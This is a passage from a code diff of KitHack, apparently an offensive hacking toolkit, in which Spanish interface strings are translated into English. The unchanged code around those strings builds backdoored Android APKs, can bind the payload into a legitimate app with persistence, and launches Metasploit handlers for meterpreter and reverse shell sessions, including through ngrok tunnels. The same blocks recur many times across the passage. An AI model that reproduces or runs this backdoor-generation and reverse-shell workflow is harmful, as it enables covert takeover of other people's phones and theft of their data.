input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -2301,24 +2291,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -2337,7 +2327,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -2353,24 +2343,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -2381,7 +2371,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) @@ -2417,39 +2407,39 @@ def main(): time.sleep(4) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) + print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -2471,7 +2461,7 @@ def main(): Tk().withdraw() icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") @@ -2508,30 +2498,30 @@ def main(): time.sleep(4) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -2547,24 +2537,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -2583,7 +2573,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -2599,24 +2589,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -2627,7 +2617,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) @@ -2663,39 +2653,39 @@ def main(): time.sleep(4) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) + print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -2717,7 +2707,7 @@ def main(): Tk().withdraw() icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") @@ -2754,30 +2744,30 @@ def main(): time.sleep(4) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -2793,24 +2783,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -2829,7 +2819,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) @@ -2845,24 +2835,24 @@ def main(): print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) break print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -2873,7 +2863,7 @@ def main(): Tk().withdraw() APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) @@ -2909,39 +2899,39 @@ def main(): time.sleep(4) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) + print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -2963,7 +2953,7 @@ def main(): Tk().withdraw() icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") @@ -3000,30 +2990,30 @@ def main(): time.sleep(4) os.system('rm -rf output/payload output/payload.apk output/kithack.apk') print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> 